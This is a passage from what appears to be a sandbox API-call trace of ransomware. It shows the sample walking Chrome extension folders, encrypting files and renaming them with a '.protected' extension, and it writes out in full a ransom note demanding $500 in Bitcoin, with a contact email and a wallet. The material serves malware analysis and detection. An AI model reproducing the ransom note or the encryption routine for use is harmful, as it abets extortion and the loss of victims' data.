lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.808] CloseHandle (hObject=0x164) returned 1 [0083.808] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.808] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0083.808] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0083.809] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0083.809] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0083.809] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0083.809] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko") returned 150 [0083.809] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0083.809] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0083.809] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\*") returned 152 [0083.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.809] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.809] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.809] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.809] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.809] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.809] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\.") returned 152 [0083.809] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.809] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.809] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.809] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.809] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.809] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.809] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.809] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\..") returned 153 [0083.809] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.809] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.809] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.809] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.809] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.809] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.809] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.809] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.809] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json") returned 164 [0083.809] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.810] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.810] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.810] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.810] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json") returned 164 [0083.810] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.810] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json") returned 164 [0083.810] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.810] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json") returned 164 [0083.810] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.810] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.811] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.811] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.812] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.812] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.819] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.819] CloseHandle (hObject=0x168) returned 1 [0083.819] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.protected") returned 174 [0083.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.protected")) returned 1 [0083.820] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.820] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.820] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\RESTORE_FILES.txt") returned 168 [0083.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.821] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.821] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.821] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.822] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.822] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.822] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.822] CloseHandle (hObject=0x164) returned 1 [0083.822] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.822] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0083.822] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0083.822] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0083.822] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0083.822] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0083.822] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt") returned 150 [0083.822] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0083.822] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0083.822] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\*") returned 152 [0083.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.831] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.831] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.831] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.831] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.831] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.832] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\.") returned 152 [0083.832] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.832] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.832] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.832] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.832] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.832] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.832] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.832] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\..") returned 153 [0083.832] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.832] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.832] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.832] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.832] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.832] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.832] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.832] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.832] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json") returned 164 [0083.832] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.832] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.832] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.832] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json") returned 164 [0083.836] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json") returned 164 [0083.836] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json") returned 164 [0083.836] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.836] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.841] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.841] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.841] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.841] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.842] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.842] CloseHandle (hObject=0x168) returned 1 [0083.842] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.protected") returned 174 [0083.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.protected")) returned 1 [0083.843] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.843] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.843] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\RESTORE_FILES.txt") returned 168 [0083.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.843] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.843] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.844] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.844] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.844] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.844] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | 